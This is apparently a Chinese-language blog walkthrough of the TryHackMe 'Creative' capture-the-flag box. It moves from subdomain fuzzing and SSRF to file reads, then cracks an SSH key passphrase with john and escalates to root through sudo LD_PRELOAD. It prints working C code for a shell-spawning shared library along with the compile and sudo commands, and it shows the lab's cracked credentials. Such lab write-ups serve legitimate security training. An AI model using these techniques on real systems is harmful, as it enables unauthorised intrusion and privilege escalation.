Stack Ashes
Go back

creative-thm

基本信息

本机目标机器
10.17.5.12110.10.28.27

信息搜集

Open 10.10.28.27:22
Open 10.10.28.27:80

写入host http://creative.thm/

子域枚举

└─$ ffuf -u http://creative.thm -w /usr/share/wordlists/amass/subdomains-top1mil-5000.txt -H "Host: FUZZ.creative.thm" -fs 178 

beta                    [Status: 200, Size: 591, Words: 91, Lines: 20, Duration: 316ms]
:: Progress: [5000/5000] :: Job [1/1] :: 111 req/sec :: Duration: [0:00:43] :: Errors: 0 ::

漏洞利用

SSRF?

思考利用

  1. file协议读取文件
  2. 对内部服务进行枚举

测试利用

  1. 不行

  2. 枚举内部端口

文件读取

saad:x:1000:1000:saad:/home/saad:/bin/bash

webshell

读取私钥文件

usershell

┌──(kali㉿kali)-[~/Documents/thm/creative]
└─$ chmod 600 id_rsa                    
┌──(kali㉿kali)-[~/Documents/thm/creative]
└─$ ssh -i id_rsa saad@beta.creative.thm
Enter passphrase for key 'id_rsa':

该死 还需要输入密码才能使用私钥

ssh2john id_rsa >id_rsa.txt

密码枚举

john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa.txt 

Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 2 for all loaded hashes
Cost 2 (iteration count) is 16 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
sweetness        (id_rsa)     
1g 0:00:00:21 DONE (2024-11-16 02:32) 0.04683g/s 44.96p/s 44.96c/s 44.96C/s xbox360..sandy
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

用该密钥进私钥登录

bash历史

echo "saad:MyStrongestPasswordYet$4291" > creds.txt

rootshell

saad@m4lware:~$ sudo -l
[sudo] password for saad: 
Matching Defaults entries for saad on m4lware:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
    env_keep+=LD_PRELOAD

User saad may run the following commands on m4lware:
    (root) /usr/bin/ping

??

env_keep+=LD_PRELOAD

这允许我们为运行的命令设置环境变量,就像 .LD_PRELOAD``root``sudo

环境变量用于指定要在进程的任何其他库之前加载的库。LD_PRELOAD

我们可以使用它来使我们运行的进程加载恶意库并运行我们的代码。root``sudo

首先,制作一个恶意的共享库,它将为我们生成一个 shell。

我们将代码放在函数中,以便在加载库时运行它。_init()

此外,在加载库后取消设置变量以阻止我们运行的其他进程再次加载库并生成另一个 shell。LD_PRELOAD

#include <stdlib.h>
void _init() {
	unsetenv("LD_PRELOAD");
	system("/bin/sh");
}

将其编译到共享库中。

gcc -fPIC -shared -o shell.so shell.c -nostartfiles
sudo LD_PRELOAD=/tmp/shell.so /usr/bin/ping
saad@m4lware:/tmp$ vim shell.c
saad@m4lware:/tmp$ cat shell.c 
#include <stdlib.h>

void _init() {
        unsetenv("LD_PRELOAD");
        system("/bin/sh");
}
saad@m4lware:/tmp$ gcc -fPIC -shared -o shell.so shell.c -nostartfiles
saad@m4lware:/tmp$ sudo LD_PRELOAD=/tmp/shell.so /usr/bin/ping
# id
uid=0(root) gid=0(root) groups=0(root)

知识点回顾

SSRF 到内部服务 内部的服务到ssh私钥 私钥的密码爆破 通过bash_history 获取到密码 通过LD_PRELOAD 进行生成so文件获取到rootshell

总结

Share this post on:
Share this post via WhatsApp Share this post on Facebook Share this post on X Share this post via Telegram Share this post on Pinterest Share this post via email
Previous Post
chess-ctf
Next Post
nahamstore